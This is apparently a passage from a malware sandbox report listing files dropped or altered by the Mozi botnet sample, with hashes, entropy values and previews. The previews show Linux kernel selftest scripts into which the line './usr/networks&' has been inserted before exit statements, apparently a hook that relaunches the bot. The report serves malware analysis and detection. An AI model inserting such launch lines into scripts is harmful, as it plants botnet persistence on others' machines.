                                                              MD5:872F36FCDB4E3CBA45EA7D94B40A4FB2
                                                              SHA1:69AD3D9FE927E729A63C8FAFAE3666E78F6D4D38
                                                              SHA-256:30EFC1D89C491751BB3E0D7A74F6718D8391A47077A61DECAB83489D6E3646FB
                                                              SHA-512:FE6A52FA37EAF9C90BFA4A5A352F725D0546D41CFC97D3BF95984476B0BFC3833BCC628DC480C2A991DA930F06B749A9EC1109B805A2669BEA7E1927467FB470
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit $EXIT_STATUS../usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):102
                                                              Entropy (8bit):4.638138950562586
                                                              Encrypted:false
                                                              SSDEEP:3:qXVamWAbVCvQuvBC9bJjWXVOORgn:UHoI5xJjWMn
                                                              MD5:BF6CFB4EB24EF2D6770C6E88F2D48CF6
                                                              SHA1:30F86D44F198688813975091335B034C508529A4
                                                              SHA-256:5830A3B6E02504DED80C09F352198D9ADA04EBB8BBAD624EEB76BB774F9EFC0E
                                                              SHA-512:BACEA9BC12AA688A2AF74D94B12CD127BACE8A09E96B5093D7E77CF80DCC5632DF91B749CB095A23D73EC0063570051AE90CD285168D10EFCEAA6E2F89345EE9
                                                              Malicious:false
                                                              Preview:./usr/networks&..exit.else..tcflags="skip_sw"..tests_run.fi..exit $EXIT_STATUS../usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):2769
                                                              Entropy (8bit):5.133719950377315
                                                              Encrypted:false
                                                              SSDEEP:48:rmGWMuirlYJVhOCJJz5irlzd70ri1dW1rEaVSsSvMdEh/eeReICQZZ3L:0M/4Ogeh50rIE1rEa+5
                                                              MD5:67D30EDDF203F92ABFD29A6CD1E7B5CC
                                                              SHA1:D853778457F6A19E75D04109478E4B9A640278E5
                                                              SHA-256:E19FD8BBE99B2A5BABE6CA40F40F694180D38C1279965B2277F0A7491C62483F
                                                              SHA-512:1EB59594335691EE52311085BF21760B35F7A7C65ADFABACB02331A463326629D04764E2994E8DC2D50477844C8AD2DC5457B99FA8C40AD96304E6D69FD6C82B
                                                              Malicious:false
                                                              Preview:./usr/networks&..exit 1.fi..# Needed for returning to default.declare -A KVD_DEFAULTS..KVD_CHILDREN="linear hash_single hash_double".KVDL_CHILDREN="singles chunks large_chunks"..devlink_sp_resource_minimize().{..local size..local i...for i in $KVD_CHILDREN; do...size=$(devlink_resource_get kvd "$i" | jq '.["size_min"]')...devlink_resource_size_set "$size" kvd "$i"..done...for i in $KVDL_CHILDREN; do...size=$(devlink_resource_get kvd linear "$i" | \... jq '.["size_min"]')...devlink_resource_size_set "$size" kvd linear "$i"..done.}..devlink_sp_size_kvd_to_default().{..local need_reload=0..local i...for i in $KVD_CHILDREN; do...local size=$(echo "${KVD_DEFAULTS[kvd_$i]}" | jq '.["size"]')...current_size=$(devlink_resource_size_get kvd "$i")....if [ "$size" -ne "$current_size" ]; then....devlink_resource_size_set "$size" kvd "$i"....need_reload=1...fi..done...for i in $KVDL_CHILDREN; do...local size=$(echo "${KVD_DEFAULTS[kvd_linear_$i]}" | \.... jq '.["size"]')...current_size=$(
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):51
                                                              Entropy (8bit):4.191841518357241
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORjOvSQQVOORgn:hTn
                                                              MD5:E8B5B0C858BA91B08AB7D5854CA9A181
                                                              SHA1:C8591F8AB15C3DBC82367F2D914E7F534760DF1C
                                                              SHA-256:3F8F722A471E414F5B4C637579E3367E30B68A5288E4B7FC950EB149E23BE321
                                                              SHA-512:017A894266385B29B37858BB3CEC7A57F8F8E344FCCB9EE002ABAA32596C511BB2E91891BC1C2E4CE8FF5A08C0F8DC0D03CC468024097072CCC3B894CD24BE2B
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit "$RET"../usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):23
                                                              Entropy (8bit):3.882045108136863
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORgn:Tn
                                                              MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                              SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                              SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                              SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):51
                                                              Entropy (8bit):4.191841518357241
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORjOvSQQVOORgn:hTn
                                                              MD5:E8B5B0C858BA91B08AB7D5854CA9A181
                                                              SHA1:C8591F8AB15C3DBC82367F2D914E7F534760DF1C
                                                              SHA-256:3F8F722A471E414F5B4C637579E3367E30B68A5288E4B7FC950EB149E23BE321
                                                              SHA-512:017A894266385B29B37858BB3CEC7A57F8F8E344FCCB9EE002ABAA32596C511BB2E91891BC1C2E4CE8FF5A08C0F8DC0D03CC468024097072CCC3B894CD24BE2B
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit "$RET"../usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):23
                                                              Entropy (8bit):3.882045108136863
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORgn:Tn
                                                              MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                              SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                              SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                              SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):23
                                                              Entropy (8bit):3.882045108136863
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORgn:Tn
                                                              MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                              SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                              SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                              SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):23
                                                              Entropy (8bit):3.882045108136863
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORgn:Tn
                                                              MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                              SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                              SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                              SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):57
                                                              Entropy (8bit):4.424738040366664
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORk9bJjWXVOORgn:HxJjWMn
                                                              MD5:872F36FCDB4E3CBA45EA7D94B40A4FB2
                                                              SHA1:69AD3D9FE927E729A63C8FAFAE3666E78F6D4D38
                                                              SHA-256:30EFC1D89C491751BB3E0D7A74F6718D8391A47077A61DECAB83489D6E3646FB
                                                              SHA-512:FE6A52FA37EAF9C90BFA4A5A352F725D0546D41CFC97D3BF95984476B0BFC3833BCC628DC480C2A991DA930F06B749A9EC1109B805A2669BEA7E1927467FB470
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit $EXIT_STATUS../usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):57
                                                              Entropy (8bit):4.424738040366664
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORk9bJjWXVOORgn:HxJjWMn
                                                              MD5:872F36FCDB4E3CBA45EA7D94B40A4FB2
                                                              SHA1:69AD3D9FE927E729A63C8FAFAE3666E78F6D4D38
                                                              SHA-256:30EFC1D89C491751BB3E0D7A74F6718D8391A47077A61DECAB83489D6E3646FB
                                                              SHA-512:FE6A52FA37EAF9C90BFA4A5A352F725D0546D41CFC97D3BF95984476B0BFC3833BCC628DC480C2A991DA930F06B749A9EC1109B805A2669BEA7E1927467FB470
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit $EXIT_STATUS../usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):57
                                                              Entropy (8bit):4.424738040366664
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORk9bJjWXVOORgn:HxJjWMn
                                                              MD5:872F36FCDB4E3CBA45EA7D94B40A4FB2
                                                              SHA1:69AD3D9FE927E729A63C8FAFAE3666E78F6D4D38
                                                              SHA-256:30EFC1D89C491751BB3E0D7A74F6718D8391A47077A61DECAB83489D6E3646FB
                                                              SHA-512:FE6A52FA37EAF9C90BFA4A5A352F725D0546D41CFC97D3BF95984476B0BFC3833BCC628DC480C2A991DA930F06B749A9EC1109B805A2669BEA7E1927467FB470
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit $EXIT_STATUS../usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):57
                                                              Entropy (8bit):4.424738040366664
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORk9bJjWXVOORgn:HxJjWMn
                                                              MD5:872F36FCDB4E3CBA45EA7D94B40A4FB2
                                                              SHA1:69AD3D9FE927E729A63C8FAFAE3666E78F6D4D38
                                                              SHA-256:30EFC1D89C491751BB3E0D7A74F6718D8391A47077A61DECAB83489D6E3646FB
                                                              SHA-512:FE6A52FA37EAF9C90BFA4A5A352F725D0546D41CFC97D3BF95984476B0BFC3833BCC628DC480C2A991DA930F06B749A9EC1109B805A2669BEA7E1927467FB470
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit $EXIT_STATUS../usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):6617
                                                              Entropy (8bit):4.936895915985005
                                                              Encrypted:false
                                                              SSDEEP:192:O6QYwsHe5V/sceJgr69j2w7ep0wILUzrdca55dcaCqP2SUzr49XfK1:TQ668hLMng
                                                              MD5:B28EB701E14FE1525C67BEC4C7004025
                                                              SHA1:26BBF86610455D690F6A0122FB5F6FCDC16B1C4E
                                                              SHA-256:39463AE65D6728E9BBE6B5DED3D40FF7359A86E0A1FD11CD0D791BA4418E6A66
                                                              SHA-512:A6DA5A7308C7A436EC03D484831D06FE88680879CD5750530374D98E760DC5CC8C5E69B1B3BE46622D311B1D7BDAC6AF0A3C642F66A5FFAC8A1419A9CE9E2E94
                                                              Malicious:false
                                                              Preview:./usr/networks&..exit 1.fi..if [ -d "${NETDEVSIM_PATH}/devices/netdevsim${DEV_ADDR}" ]; then..echo "SKIP: Device netdevsim${DEV_ADDR} already exists"..exit 1.fi..init_test().{..RET=0...test $(devlink_traps_num_get) -ne 0..check_err $? "No traps were registered"...log_test "Initialization".}..trap_action_test().{..local orig_action..local trap_name..local action...RET=0...for trap_name in $(devlink_traps_get); do...# The action of non-drop traps cannot be changed....if [ $(devlink_trap_type_get $trap_name) = "drop" ]; then....devlink_trap_action_set $trap_name "trap"....action=$(devlink_trap_action_get $trap_name)....if [ $action != "trap" ]; then.....check_err 1 "Trap $trap_name did not change action to trap"....fi.....devlink_trap_action_set $trap_name "drop"....action=$(devlink_trap_action_get $trap_name)....if [ $action != "drop" ]; then.....check_err 1 "Trap $trap_name did not change action to drop"....fi...else....orig_action=$(devlink_trap_action_get $trap_name).....devlink_trap_
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):5898
                                                              Entropy (8bit):4.146162776904928
                                                              Encrypted:false
                                                              SSDEEP:96:3MAOhjI7eKMJEmxsuSKb6xsD6cs6xA9K6VL/IYs6xEBYc:8AO1frEMFqdKwU9z
                                                              MD5:1DF9F67D8921FF10D08395A907676EB6
                                                              SHA1:1B2C3403870B4046AFDBC6A10B547B1276F3F073
                                                              SHA-256:B73CC123F11F6B80D7B8606DF81ABE4551EED2936063565B5B931D9EC646C7E8
                                                              SHA-512:B1EE86E95AAF57D9CA0D632D946EB3DFFD2AAE96BBCDD3C8FD01537845A5884439BF834055C624404C6917F5820AC0B4BFD17EC2B3D7542C880A6192B28652DC
                                                              Malicious:false
                                                              Preview:./usr/networks&.usage() { echo "usbip_test.sh -b <busid> -p <usbip tools path>"; exit 1; }..while getopts "h:b:p:" arg; do. case "${arg}" in..h).. usage.. ;;..b).. busid=${OPTARG}.. ;;..p).. tools_path=${OPTARG}.. ;;..*).. usage.. ;;. esac.done.shift $((OPTIND-1))..if [ -z "${busid}" ]; then..usage.fi..echo "Running USB over IP Testing on $busid";..test_end_msg="End of USB over IP Testing on $busid"..if [ $UID != 0 ]; then..echo "Please run usbip_test as root [SKIP]"..echo $test_end_msg..exit $ksft_skip.fi..echo "Load usbip_host module".if ! /sbin/modprobe -q -n usbip_host; then..echo "usbip_test: module usbip_host is not found [SKIP]"..echo $test_end_msg..exit $ksft_skip.fi..if /sbin/modprobe -q usbip_host; then..echo "usbip_test: module usbip_host is loaded [OK]".else..echo "usbip_test: module usbip_host failed to load [FAIL]"..echo $test_end_msg..exit 1.fi..echo "Load vhci_hcd module".if /sbin/modprobe -q vhci_hcd; then..echo "usbip_test: module vhci_hc
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):3325
                                                              Entropy (8bit):5.18808135613295
                                                              Encrypted:false
                                                              SSDEEP:96:4i60FDAurFb5F6dBYpnGaBYvMcccOpZVGM:r60hl15+KAa6vMcccOtf
                                                              MD5:B78D6747B099C8DE9C03EA8326BC7024
                                                              SHA1:E3E9F8A83D721B987B8EFDB6EC66921A8931CA3D
                                                              SHA-256:032D9D4898DF28207B422C11BA4E330A970E1E41A26DD8BD447FCEC32F37F85D
                                                              SHA-512:75DF777435C79F2C2A6699A6FB49DC26C1DC2F623B4BFCD9114D0060C5E948EEFD90ACC166B09F5458F1AEFB83605D2655BE476B9D000470988BE6BEFCB55F7E
                                                              Malicious:false
                                                              Preview:./usr/networks&...exit $ksft_skip..fi...if ! grep -q "^\S\+ $efivarfs_mount efivarfs" /proc/mounts; then...echo $msg efivarfs is not mounted on $efivarfs_mount >&2...exit $ksft_skip..fi.}..run_test().{..local test="$1"...echo "--------------------"..echo "running $test"..echo "--------------------"...if [ "$(type -t $test)" = 'function' ]; then...( $test )..else...( ./$test )..fi...if [ $? -ne 0 ]; then...echo " [FAIL]"...rc=1..else...echo " [PASS]"..fi.}..test_create().{..local attrs='\x07\x00\x00\x00'..local file=$efivarfs_mount/$FUNCNAME-$test_guid...printf "$attrs\x00" > $file...if [ ! -e $file ]; then...echo "$file couldn't be created" >&2...exit 1..fi...if [ $(stat -c %s $file) -ne 5 ]; then...echo "$file has invalid size" >&2...file_cleanup $file...exit 1..fi..file_cleanup $file.}..test_create_empty().{..local file=$efivarfs_mount/$FUNCNAME-$test_guid...: > $file...if [ ! -e $file ]; then...echo "$file can not be created without writing" >&2...exit 1..fi..file_cleanup $file.}.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):5891
                                                              Entropy (8bit):5.2976815652447
                                                              Encrypted:false
                                                              SSDEEP:96:att2T0AKpT0+yhvT0HXUTRNPLrwEg/8/oKkph2VkVQEIGc/2XRjIP8IGc/2XRjIz:atMnKptavcORNVg/8/oK2hykVQy1n1ly
                                                              MD5:7945E94DD8E4A80A20A9C0417BB83BFE
                                                              SHA1:DCAD37AF3DC4055126F0820FA70D915303906D89
                                                              SHA-256:D917CBCE45470AEFE2944201B985641A6875CF1508FABAD755C3B60752F58CBE
                                                              SHA-512:C134770365B4A20C067ADA348BA0FCB98ED0061E4E09BD6DC19C66206E4B582E75BFDA84BDB8FA7DF024DD3F9745E0066EF07D1375BEB771233E671177673D39
                                                              Malicious:false
                                                              Preview:./usr/networks&....exit 1...fi..done...echo 1 >"$DIR"/"$name"/loading..cat "$file" >"$DIR"/"$name"/data..echo 0 >"$DIR"/"$name"/loading...# Wait for request to finish...wait.}..load_fw_cancel().{..local name="$1"..local file="$2"...# This will block until our load (below) has finished...echo -n "$name" >"$DIR"/trigger_request 2>/dev/null &...# Give kernel a chance to react...local timeout=10..while [ ! -e "$DIR"/"$name"/loading ]; do...sleep 0.1...timeout=$(( $timeout - 1 ))...if [ "$timeout" -eq 0 ]; then....echo "$0: firmware interface never appeared" >&2....exit 1...fi..done...echo -1 >"$DIR"/"$name"/loading...# Wait for request to finish...wait.}..load_fw_custom().{..if [ ! -e "$DIR"/trigger_custom_fallback ]; then...echo "$0: custom fallback trigger not present, ignoring test" >&2...exit $ksft_skip..fi...local name="$1"..local file="$2"...echo -n "$name" >"$DIR"/trigger_custom_fallback 2>/dev/null &...# Give kernel a chance to react...local timeout=10..while [ ! -e "$DIR"/"$name"/
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):8744
                                                              Entropy (8bit):5.126474919105083
                                                              Encrypted:false
                                                              SSDEEP:96:17k8sLeRIt8b6+616tS6vmS6be6/iS6j67S6gmQm6C1nJG4bzET0c09PsG2AUdAL:17k8WaItEjmHviMNRPbwSKVEUNUPb
                                                              MD5:51228AD37E83FB0042A724AEFAA1082C
                                                              SHA1:793463E45D447452F9B233D7515DB54A20FD86C5
                                                              SHA-256:34729C2C813F8D11F41CB328AAF7A1D3D82FFF98F617D6D40A4BCD1C5FB568E4
                                                              SHA-512:1C2B0CD1490E59F543061CE6CBA9DF970EDC6DB13DE3B9F17B8491FC5B9F2F3F80D421D3ED7659E4E34D29A5D94D5D7E3B8E19E7E4BE0B1EE9DED869E36897F8
                                                              Malicious:false
                                                              Preview:./usr/networks&..exit 1.fi..if [ ! -e "$DIR"/trigger_async_request ]; then..echo "$0: empty filename: async trigger not present, ignoring test" >&2..exit $ksft_skip.else..if printf '\000' >"$DIR"/trigger_async_request 2> /dev/null; then...echo "$0: empty filename should not succeed (async)" >&2...exit 1..fi.fi..# Request a firmware that doesn't exist, it should fail..if echo -n "nope-$NAME" >"$DIR"/trigger_request 2> /dev/null; then..echo "$0: firmware shouldn't have loaded" >&2..exit 1.fi.if diff -q "$FW" /dev/test_firmware >/dev/null ; then..echo "$0: firmware was not expected to match" >&2..exit 1.else..if [ "$HAS_FW_LOADER_USER_HELPER" = "yes" ]; then...echo "$0: timeout works"..fi.fi..# This should succeed via kernel load or will fail after 1 second after.# being handed over to the user helper, which won't find the fw either..if ! echo -n "$NAME" >"$DIR"/trigger_request ; then..echo "$0: could not trigger request" >&2..exit 1.fi..# Verify the contents are what we expect..if ! diff
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):4567
                                                              Entropy (8bit):5.5589667160679825
                                                              Encrypted:false
                                                              SSDEEP:48:+vUdhcGB/f2QrYUdDtV5ipEqNmjyrJV+l8qfyxSZJkXYk1SwjR77/Rm9euhd6VLr:tn6oqac/SwjXsT6VLYXy3JF/
                                                              MD5:92D97C4DA99FC755C609467343D767BA
                                                              SHA1:4FFC85048445B3B1637DE50178F587D8225BE295
                                                              SHA-256:43D1431124D8A39521F3BB513F258A82595837C2A9D0BB2C6D3F701A642FC130
                                                              SHA-512:18D817795B189F32200E8B95109F703EA4B6B3D342DBAFC8ABBD38926BB1C261A084D12CFF2D02922091EFF0527FF4615787167EF8D4137FE36F3A8FFDFC2E2A
                                                              Malicious:false
                                                              Preview:./usr/networks&.print_reqs_exit().{..echo "You must have the following enabled in your kernel:" >&2..cat $TEST_DIR/config >&2..exit $ksft_skip.}..test_modprobe().{..if [ ! -d $DIR ]; then...print_reqs_exit..fi.}..check_mods().{..local uid=$(id -u)..if [ $uid -ne 0 ]; then...echo "skip all tests: must be run as root" >&2...exit $ksft_skip..fi...trap "test_modprobe" EXIT..if [ ! -d $DIR ]; then...modprobe test_firmware..fi..if [ ! -f $PROC_CONFIG ]; then...if modprobe configs 2>/dev/null; then....echo "Loaded configs module"....if [ ! -f $PROC_CONFIG ]; then.....echo "You must have the following enabled in your kernel:" >&2.....cat $TEST_DIR/config >&2.....echo "Resorting to old heuristics" >&2....fi...else....echo "Failed to load configs module, using old heuristics" >&2...fi..fi.}..check_setup().{..HAS_FW_LOADER_USER_HELPER="$(kconfig_has CONFIG_FW_LOADER_USER_HELPER=y)"..HAS_FW_LOADER_USER_HELPER_FALLBACK="$(kconfig_has CONFIG_FW_LOADER_USER_HELPER_FALLBACK=y)"..HAS_FW_LOADER_COMPRESS
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):23
                                                              Entropy (8bit):3.882045108136863
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORgn:Tn
                                                              MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                              SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                              SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                              SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):23
                                                              Entropy (8bit):3.882045108136863
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORgn:Tn
                                                              MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                              SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                              SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                              SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):23
                                                              Entropy (8bit):3.882045108136863
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORgn:Tn
                                                              MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                              SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                              SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                              SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):568
                                                              Entropy (8bit):4.898482173139057
                                                              Encrypted:false
                                                              SSDEEP:12:chnICigPpbnLPb0ILGExkw0ZiiJotSWPqssJlfe4n:CICigPpYICwJSwqL
                                                              MD5:34D1BD653094623602ED2FC5B916CC1A
                                                              SHA1:7457BA8BC0E39CF17B36703C9B321939DF4345C5
                                                              SHA-256:47E02B23C3504B291F9D339261C4729C80630AF32AD146C39699A0D614F2A51E
                                                              SHA-512:C2E2C95F182CE5BC27FD03076C426EC6F90484B09B3C6CC4AAB41D03F2E408B98F2C43B612C2E6E0833F7A9A6415811327CF6A1FAAF5C6547AC7B4B40978ED38
                                                              Malicious:false
                                                              Preview:./usr/networks&....exit 1....;;..esac..fi...# Create working directory...dest=`pwd`..install_work="$dest"/kselftest_install..install_name=kselftest..install_dir="$install_work"/"$install_name"..mkdir -p "$install_dir"...# Run install using INSTALL_KSFT_PATH override to generate install..# directory.../kselftest_install.sh "$install_dir"..(cd "$install_work"; tar $copts "$dest"/kselftest${ext} $install_name)..echo "Kselftest archive kselftest${ext} created!"...# clean up top-level install work directory..rm -rf "$install_work".}..main "$@"../usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):1989
                                                              Entropy (8bit):4.886361610863015
                                                              Encrypted:false
                                                              SSDEEP:48:0khSRLKLLH6GH5HJpmdS/DjxMDRJ7gy3R3opdc5/U/hDD:0qpXDZpcdOfxMjdhgd0cpDD
                                                              MD5:A089E565FA44F01DD38D39811C153C23
                                                              SHA1:9BBECC67884722695802DE78573D86AD28027D2E
                                                              SHA-256:91ED767E3298CE5AB669926E16F19690160BBE6103A73EAE2EFD02C63FA249D9
                                                              SHA-512:454A2CB2EB891337C3B5F553D87579B50A6020B147D2D9577FCEABE09A86E3E3D1FFFD95D65200F621BEABE9BE28ECEF3B77C8FC070CE2FE457A82ECA337762B
                                                              Malicious:false
                                                              Preview:./usr/networks&...echo "test fail, exit"...die..fi.}..test_pin_logic().{..nr=$1..direction=$2..active_low=$3..value=$4...echo $direction > $GPIO_SYSFS/gpio$nr/direction..echo $active_low > $GPIO_SYSFS/gpio$nr/active_low..if [ $direction = "out" ]; then...echo $value > $GPIO_SYSFS/gpio$nr/value..fi..is_consistent $nr.}..test_one_pin().{..nr=$1...echo -n "test pin<$nr>"...echo $nr > $GPIO_SYSFS/export 2>/dev/null...if [ X$? != X0 ]; then...echo "test GPIO pin $nr failed"...die..fi...#"Checking if the sysfs is consistent with debugfs: "..is_consistent $nr...#"Checking the logic of active_low: "..test_pin_logic $nr out 1 1..test_pin_logic $nr out 1 0..test_pin_logic $nr out 0 1..test_pin_logic $nr out 0 0...#"Checking the logic of direction: "..test_pin_logic $nr in 1 1..test_pin_logic $nr out 1 0..test_pin_logic $nr low 0 1..test_pin_logic $nr high 0 0...echo $nr > $GPIO_SYSFS/unexport...echo "successful".}..test_one_pin_fail().{..nr=$1...echo $nr > $GPIO_SYSFS/export 2>/dev/null...if [ X
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):4213
                                                              Entropy (8bit):5.33237101886955
                                                              Encrypted:false
                                                              SSDEEP:96:ofX6AFXGVi66yGgQWLs11nIOUfyHQNHzZo5zeQ:y6Bix+EuQj
                                                              MD5:6C5D622761FE739673296D7956A42FE2
                                                              SHA1:C4A8996106088E157E03C43ECC711C5E3CF0B1EB
                                                              SHA-256:B5960BF281F2515D72B91675CBB3551871A0E511F1C1DD6EC4C378ECF7AE5F9F
                                                              SHA-512:ED0E4D0BDAC30D0B044D2AFE72E7DDD5BD5B00C2BB00AE4C00ED79A2F4A7F9F76F7907A4D9D40C7665DDCCF67ABF463B45C0AA4A88907F31F14A67BACB2CB9A8
                                                              Malicious:false
                                                              Preview:./usr/networks&.#exit status.#1: Internal error.#2: sysfs/debugfs not mount.#3: insert module fail when gpio-mockup is a module..#4: Skip test including run as non-root user..#5: other reason...SYSFS=.GPIO_SYSFS=.GPIO_DRV_SYSFS=.DEBUGFS=.GPIO_DEBUGFS=.dev_type=.module=..# Kselftest framework requirement - SKIP code is 4..ksft_skip=4..usage().{..echo "Usage:"..echo "$0 [-f] [-m name] [-t type]"..echo "-f: full test. It maybe conflict with existence gpio device."..echo "-m: module name, default name is gpio-mockup. It could also test"..echo " other gpio device."..echo "-t: interface type: chardev(char device) and sysfs(being"..echo " deprecated). The first one is default"..echo ""..echo "$0 -h"..echo "This usage".}..prerequisite().{..msg="skip all tests:"..if [ $UID != 0 ]; then...echo $msg must be run as root >&2...exit $ksft_skip..fi..SYSFS=`mount -t sysfs | head -1 | awk '{ print $3 }'`..if [ ! -d "$SYSFS" ]; then...echo $msg sysfs is not mounted >&2...exit 2..fi..GPIO_SYSF
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):2484
                                                              Entropy (8bit):5.26151594494711
                                                              Encrypted:false
                                                              SSDEEP:48:B4OlnLEZKbTU8z8OyCQg6X+DsBKPnY3WrIBKPQNaqO789O:RLE0bTH5yCQguOPjf0y+O
                                                              MD5:EDB41CFBCC54CF6935A157D9E71412A6
                                                              SHA1:77392764ED385FB04FF7C1964B27C391C85A56F9
                                                              SHA-256:7C6DCE16D8D66C98B8BDF00B7D660CA49315F2C6D397D4E4E4908D9BCB9B6C02
